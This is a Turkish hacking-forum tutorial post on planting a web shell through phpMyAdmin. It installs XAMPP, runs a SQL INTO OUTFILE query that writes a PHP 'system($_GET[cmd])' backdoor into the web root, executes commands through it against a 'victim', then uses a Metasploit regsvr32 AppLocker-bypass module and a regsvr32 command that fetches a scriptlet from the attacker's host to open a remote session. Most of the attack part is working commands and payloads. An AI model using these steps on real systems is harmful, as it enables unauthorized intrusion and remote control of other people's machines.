THT DUYURU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

phpMyAdmin Shell Upload // Xowly

Xowly - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
06/2019
Nereden:
ғ˦
Mesajlar:
395
Konular:
70
Teşekkür (Etti):
384
Teşekkür (Aldı):
242
Ticaret:
(0) %
19-09-2019 18:28
#1
phpMyAdmin Shell Upload // Xowly
Merhabalar, değerli Türk Hack Team ailesi bu gün sizlere "phpMyAdmin Shell Upload" konusunu
anlatacağım. Önemli olan başlıkları inceleyelim.




phpMyAdmin

phpMyAdmin temelinde php ile yazılmış bir araçtır. phpMyAdmin MySQL'in yönetim birimidir. phpMyAdmin ile birçok geniş işlemler yapabilir, kolayca sistemimizde
ortaya çıkan hataları kaldırabiliriz. Veritabanları, sütunları, kullanıcıları ve dizinleri kolaylıkla kontrol edebilir, bunlar

üzerinden geniş çaplı işlemler yapabiliriz. Ayrıca phpMyAdmin php ile geliştirilen en popüler uygulamalardan biridir.
Bu uygulama üzerinden "SQL Sorguları" gönderebilir, bu sorguları görüntüleyebiliriz.



Shell

Shell temel olarak bir atılan sitede size üst düzey yetkiler veren bir materyaldir. Pentest aşamalarında sıkça kullanılan shell size silme, yazma, okuma
gibi çeşitli yetkiler verebilir. Shell sayesinde site sahibinin yetkilerine veya host sahibinin yetkilerine ulaşım

sağlamak mümkündür. Kısacası shell kullanıldığı takdirde size "Permission Yetkisi" vermektedir. Shell atığımız zaman eğer tam
yetkimiz yok ise o zaman root olmaya çalışmak gibi çeşitli işlemler yapmamız gerekmektedir.






Shell Atmanın Yolları

• Remote File Iclusion Vulnerability
• SQL Injection Vulnerability
• Exploits
• Upload Vulnerability
• Social Engineering


Gibi çeşitli Vulnerability, Exploits çeşitleri ve yöntemleri ile shell upload yapabiliriz.





Konuda Geçen Başlıklar

• phpMyAdmin Nedir?

• Shell Nedir?

• Shell Atmanın Yolları

• phpMyAdmin Shell Upload Kurulumlar ve Nasıl Yapılır?






phpMyAdmin Shell Upload Kurulumlar ve Nasıl Yapılır?



İlk olarak Xampp uygulamasını kuracağımız siteye göz atalım.








Daha sonra terminalimizi açıyoruz ve Xampp kurulumuna başlıyoruz.


Kod:
wget http://downloads.sourceforge.net/project/xampp/XAMPP%20Linux/1.8.3/xampp-linux-x64-1.8.3-3-installer.run






Şimdi yüklendiğinden emin olmak için dizinleri kontrol ediyoruz.



Kod:
ls






Dosyanın ayarlamalarını yapıyoruz.


Kod:
sudo chmod +x xampp-linux-x64-1.8.3-3-installer.run





Daha sonrasında artık setup dosyamızı çalıştırıyoruz.


Kod:
sudo ./xampp-linux-x64-1.8.3-3-installer.run



Ardından setup'a başlıyoruz. "Next" butonuna basıyoruz.




Ardından gelen ekranda iki seçeneğin de seçili olduğundan emin olup "next" diyoruz.







Gelen ekranda "next" diyoruz.







Yeniden gelen ekranda "next" diyoruz.








Bir daha "next" diyoruz.







Yüklenmesini bekliyoruz ve yüklendikten sonra "next" diyoruz.







Kutucuğun seçili olduğundan emin olduktan sonra "finish" butonuna tıklıyoruz.







Ardından karşımıza bu sayfa çıkıyor. Burdan "phpMyAdmin" bölümüne tıklıyoruz.








Daha sonrasında burdan "new" butonuna tıklıyoruz.








Buradan üstten "SQL" yazan bölüme tıklıyoruz.









SQL Bölümündeki kutucuğa kodu yazıyoruz. "Go" veya "Git" butonuna tıklıyoruz.


Kod:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"








Shell'in başarıyla oluşturulduğunu kontrol amaçlı "http://192.168.1.101:81/backdoor.php" sitesine gidiyoruz. (url lhost'a göre değişir.)









Daha sonra bu "http://192.168.1.101:81/backdoor.php?cmd=dir" url'ye gidiyoruz. Kurbanımızın bilgileri karşımıza çıkıyor.









Daha sonra araçlarımızın güncel olduğundan emin olmak için araçlarımızı güncelliyoruz. (Yapmak zorunlu değil, güncelleme yakın zamanda
yapmayanlar için hata çıkmaması amacıyla yapıyoruz.)










Aracımızı açıyoruz. Ardından exploitimizi seçiyoruz.




Kod:
msfconsole


Kod:
use exploit/windows/misc/regsvr32_applocker_bypass_server









Kurbanımızın bilgilerini giriyoruz. (lhost değişmektedir.)



Kod:
set lhost 192.168.1.33



Kod:
set lport 4444











Daha sonra artık exploit'i çalıştırıyoruz.


Kod:
exploit








Daha sonra windows'dan cmd içerisinden veya "http://192.168.1.104:8080/cmd=regsvr32 /s /n /u

i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll"
linkinden giriş gerçekleştiriyoruz.



Kod:
regsvr32 /s /n /u / i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll






Terminale geri döndüğümüzde bu şekilde gözükücektir.



Kurbanımızın cihazının bilgilerini öğrenmek için "sysinfo" yazıyoruz.



Kod:
sysinfo









Evet Türk Hack Team ailesi konum bu kadar. Bir sonraki konumda görüşmek üzere. Esenlikler.


Konu "Atmaca tarafından (27-09-2019 22:41 Saat 22:41 ) değiştirilmiştir.
Xowly - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
06/2019
Nereden:
ғ˦
Mesajlar:
395
Konular:
70
Teşekkür (Etti):
384
Teşekkür (Aldı):
242
Ticaret:
(0) %
19-09-2019 22:36
#2
Cevap: phpMyAdmin Shell Upload // Xowly
Güncel

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler